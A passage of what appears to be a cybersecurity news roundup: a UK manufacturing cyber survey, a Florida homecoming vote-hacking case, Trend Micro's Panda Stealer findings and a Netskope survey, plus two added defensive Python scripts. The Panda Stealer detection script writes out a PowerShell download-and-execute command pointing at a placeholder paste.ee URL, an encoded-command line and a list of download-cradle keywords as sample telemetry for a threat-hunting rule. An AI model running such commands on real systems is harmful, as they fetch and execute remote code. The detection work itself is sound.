In the UK, 63% experienced losses of up to £5000 and nearly a quarter (22%) lost between £5000 and £25,000.
On the positive front, things slowly seem to be improving in the sector. Over two-fifths (43%) of respondents to the Make UK poll said they’ve been asked by a customer to demonstrate or guarantee the robustness of their cyber processes. Plus, one fifth claimed to have asked customers or suppliers to prove similar.
However, 44% still don’t offer staff cybersecurity awareness training and 47% don’t have a formalized incident response plan in place, the report found.
The cyber-threat to manufacturers is undoubtedly growing, warned Make UK CEO, Stephen Phipson.
“No business can afford to ignore this issue and while the increased awareness across the sector is encouraging, there is still much to be done with too many businesses still burying their heads in the sand,” he argued.
“This is a strategic threat; failing to get this right as a nation could cost the UK economy billions of pounds and put thousands of jobs at risk. Every business is vulnerable and every business needs to take the necessary steps to protect themselves properly.”
A teenager from Florida who allegedly hacked into the accounts of Pensacola high school students to cast fraudulent homecoming court votes for herself is facing felony charges.
Tate High School homecoming queen Emily Rose Grover allegedly teamed up with her mother, 50-year-old Laura Rose Carroll, to cast nearly 250 fake votes. Carroll works as an assistant principal at Bellview Elementary School in Escambia County.
Agents with the Florida Department of Law Enforcement (FDLE) arrested Pensacola residents Carroll and Grover on March 15, 2021.
Each defendant was charged with one count of offenses against users of computers, computer systems, computer networks, and electronic devices (a third-degree felony), one count of unlawful use of a two-way communications device (a third-degree felony), one count of criminal use of personally identifiable information (a third-degree felony), and one count of conspiracy to commit these offenses (a first-degree misdemeanor).
An investigation into the homecoming election was instigated in November 2020 when the Escambia County School District contacted local police to report unauthorized access into hundreds of student accounts.
The investigation found that Carroll and her daughter had accessed 246 student FOCUS accounts. The accounts are part of the FOCUS program, the school district’s student information system, to which Carroll had district-level access.
"In October 2020, hundreds of votes for Tate High School’s Homecoming Court voting were flagged as fraudulent, with 117 votes originating from the same IP address within a short period of time," said a FDLE spokesperson.
"Agents uncovered evidence of unauthorized access to FOCUS linked to Carroll’s cell phone as well as computers associated with their residence, with a total of 246 votes cast for the Homecoming Court."
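The flag that started the investigation, many ballots from one IP address in a short period, is a velocity check over the vote log. The block below is an added example written for this page, not the FDLE's or the school district's tooling: the vote records, account names, addresses and the thresholds (more than 5 ballots from one address within 10 minutes) are constructed assumptions. It keeps a sliding window per source address and reports, for each address that exceeded the threshold, the peak count and every account that voted from it, which is the review list an investigator would want.

```python
"""Added example (not the FDLE's or the school district's tooling): the kind
of per-IP velocity check that flags a burst of ballots from one source
address. Timestamps, accounts, IPs and thresholds are constructed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple

DEFAULT_WINDOW = timedelta(minutes=10)   # assumption: tune per election
DEFAULT_MAX_VOTES = 5                    # assumption: ballots allowed per IP per window


class Vote(NamedTuple):
    ts: datetime
    account: str    # student account that cast the ballot
    src_ip: str
    candidate: str


def flag_ip_bursts(votes, max_votes: int = DEFAULT_MAX_VOTES,
                   window: timedelta = DEFAULT_WINDOW) -> Dict[str, dict]:
    """Sliding-window count per source IP. Returns, for each IP that ever
    exceeded max_votes inside one window, the peak count, the window in
    which it happened, and every account that voted from that IP."""
    by_ip: Dict[str, deque] = defaultdict(deque)
    accounts: Dict[str, set] = defaultdict(set)
    flagged: Dict[str, dict] = {}
    for v in sorted(votes, key=lambda x: x.ts):        # oldest first
        q = by_ip[v.src_ip]
        q.append(v.ts)
        while q and v.ts - q[0] > window:              # drop ballots that fell out of the window
            q.popleft()
        accounts[v.src_ip].add(v.account)
        if len(q) > max_votes and len(q) > flagged.get(v.src_ip, {}).get("peak", 0):
            flagged[v.src_ip] = {"peak": len(q), "window_start": q[0], "window_end": v.ts}
    for ip in flagged:
        flagged[ip]["accounts"] = sorted(accounts[ip])
    return flagged


def suspect_ballots(votes, flagged) -> List[Vote]:
    """Every ballot cast from a flagged IP, for the investigators' review list."""
    return [v for v in votes if v.src_ip in flagged]


def constructed_votes() -> List[Vote]:
    """Constructed sample log: one burst, one household NAT, one shared library PC."""
    t0 = datetime(2020, 10, 27, 19, 0)
    votes = []
    # 1. A burst: one address casts ballots from 12 different accounts in under 6 minutes.
    for i in range(12):
        votes.append(Vote(t0 + timedelta(seconds=30 * i), f"stu{1000 + i}", "203.0.113.7", "Candidate A"))
    # 2. A household NAT: 4 ballots spread over two evenings, nothing unusual.
    for i in range(4):
        votes.append(Vote(t0 + timedelta(hours=6 * i), f"stu{2000 + i}", "198.51.100.20", "Candidate B"))
    # 3. A shared library PC: 8 ballots across a school day, 45 minutes apart.
    for i in range(8):
        votes.append(Vote(t0 - timedelta(hours=8) + timedelta(minutes=45 * i),
                          f"stu{3000 + i}", "192.0.2.5", "Candidate C"))
    return votes


if __name__ == "__main__":
    votes = constructed_votes()
    for ip, info in flag_ip_bursts(votes).items():
        print(f"{ip}: peak {info['peak']} ballots in one window, "
              f"{len(info['accounts'])} accounts, {info['window_start']} to {info['window_end']}")
```

The window is a deque per address so each ballot is pushed and popped at most once, which keeps the check linear in the number of votes; the shared-PC and household cases stay below the threshold because their ballots are spread out, which is the distinction between a shared address and a scripted burst.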
When police interviewed students at Grover's high school, many of them reported hearing Grover describe how she had used her mother's FOCUS account to cast homecoming queen votes for herself.
"The investigation also found that beginning August 2019, Carroll’s FOCUS account accessed 372 high school records and 339 of those were of Tate High School students," said the FDLE.
The county's State Attorney’s Office has reportedly stated that eighteen-year-old Grover, who was aged 17 at the time of the alleged offense, will be tried as an adult when her case comes to court next week.
A new information stealer is going after cryptocurrency wallets and credentials for applications including NordVPN, Telegram, Discord, and Steam.
The attack campaign appears to be primarily targeting users in Australia, Germany, Japan, and the United States.
Panda Stealer was discovered by Trend Micro at the start of April. Threat researchers have identified two infection chains being used by the campaign.
They said: "In one, an .XLSM attachment contains macros that download a loader. Then, the loader downloads and executes the main stealer.
"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command."
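Both chains end the same way: an Excel process spawns a script host that fetches the next stage, in the second case from paste.ee. That lineage plus the command line is what endpoint telemetry can catch. The block below is an added example written for this page, not Trend Micro's detection content: the event format, the sample events, the encoded base64 blob and the indicator list are constructed. Only paste.ee comes from the report; pastebin.com, the encoded-command flag and the download-cradle strings are generic assumptions a hunter would add.

```python
"""Added example (not Trend Micro's tooling): flag process-creation events
that look like the delivery chain above, an Office document spawning a script
host that pulls a second stage from paste.ee. Event format, field names and
sample events are constructed; paste.ee comes from the report, the remaining
indicators are generic assumptions."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str


OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# paste.ee is named in the report; pastebin.com is an assumed sibling.
PASTE_SITES = re.compile(r"paste\.ee|pastebin\.com", re.I)
# PowerShell accepts any prefix of -EncodedCommand (and -ec); match them all.
_PREFIXES = ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)] + ["ec"]
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:" + "|".join(sorted(_PREFIXES, key=len, reverse=True)) + r")(?=\s|$)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|invoke-expression|\biex\b", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def indicators(ev: ProcEvent) -> List[str]:
    """Return the indicators matched by one event (empty list if none)."""
    hits = []
    if basename(ev.parent_image) in OFFICE_PARENTS and basename(ev.image) in SCRIPT_HOSTS:
        hits.append("office-spawned-script-host")
    if PASTE_SITES.search(ev.command_line):
        hits.append("paste-site-url")
    if ENCODED_FLAG.search(ev.command_line):
        hits.append("encoded-command")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        hits.append("download-cradle")
    return hits


def hunt(events) -> List[Tuple[int, List[str]]]:
    """Alert where an Office app spawned a script host AND the command line
    carries at least one delivery indicator; lineage alone is noisy in
    environments with legitimate macro tooling."""
    alerts = []
    for i, ev in enumerate(events):
        hits = indicators(ev)
        if "office-spawned-script-host" in hits and len(hits) >= 2:
            alerts.append((i, hits))
    return alerts


# Constructed sample telemetry in Sysmon-style process-creation fields.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://paste.ee/r/EXAMPLE')\""),   # constructed URL
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Service"),       # admin, benign
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),  # constructed blob
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Requiring two indicators keeps an administrator's PowerShell session out of the alert list while still catching the cmd.exe-wrapped variant, where the second stage is hidden in an encoded command rather than a visible paste.ee URL.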
Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.
Other cards up Panda's sleeve are the ability to take screenshots of the infected computer and the power to exfiltrate data from browsers, like cookies, passwords, and cards.
Researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said that the server assigned to this address has been suspended.
Panda Stealer was determined to be a variant of Collector Stealer, cracked by Russian threat actor NCP, also known as su1c1de.
"Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel," noted researchers.
While the two stealers behave similarly, they have different command and control server URLs, build tags, and execution folders.
CTO Michael Gorelik, who heads the threat intelligence team for Morphisec, has seen the number of infostealers shoot up since the Emotet network was disrupted.
When analyzing the different types of attacks Morphisec detected across seven million enterprise endpoints over the last 12 months, Gorelik found that infostealers made up the highest percentage of attempted endpoint attacks (31%).
Poor Working Relationships Between Security and Networking Teams Preventing Benefits of Digital Transformation
Organizations’ digital transformation projects are being held back through lack of collaboration between security and networking teams, according to a new study by Netskope.
The survey of IT professionals in the UK, France, and Germany, undertaken by Censuswide on behalf of the cloud security firm, revealed that two key components of IT teams—networking and security—often have a poor working relationship. Despite nearly half (45%) of security and networking teams operating within the same group and reporting to a common boss, 43% of those surveyed stated that "the security and networking teams don’t really work together much."
An even higher proportion (44%) of IT pros described the relationship between these teams in negative terms—"combative" (13%), "dysfunctional" (10%), "frosty" (10%), or "irrelevant" (10%).
This appears to be having major consequences, with more than half (51%) of participants agreeing that lack of collaboration between specialist teams is preventing their organization from experiencing the benefits of digital transformation. This figure rose to 54% when focusing on the responses of CIOs.
The findings come in the context of a surge in new or accelerated digital transformation projects in the past year brought about by the COVID-19 crisis, which has forced many organizations to change the way they operate. Undertaking such transformations safely requires close collaboration with security teams.
More encouragingly, the network and security professionals surveyed highlighted the same top three priorities for driving their team’s activity in 2021, which are "supporting increased productivity for the organization as a whole," "increasing visibility and control," and "expansion of infrastructure to support business growth." Additionally, the survey found that digital transformation projects are being regularly pursued by both teams, with 85% of all participants either working on such a project or having just completed one.
Andre Stewart, VP and MD EMEA at Netskope, commented: “All big companies have their politics and often different divisions compete for budget or strategic importance at the board level but digital transformation is happening now. A more dispersed workforce using a greater number of apps for greater efficiency is creating exponential data growth and a much broader attack surface for hackers. That means network transformation and security transformation must happen now with digital transformation.
“Given this evident divide between networking and security teams, CEOs and/or CIOs must get involved or the progress and competitive advantage that could be reaped from digital transformation will be weak.”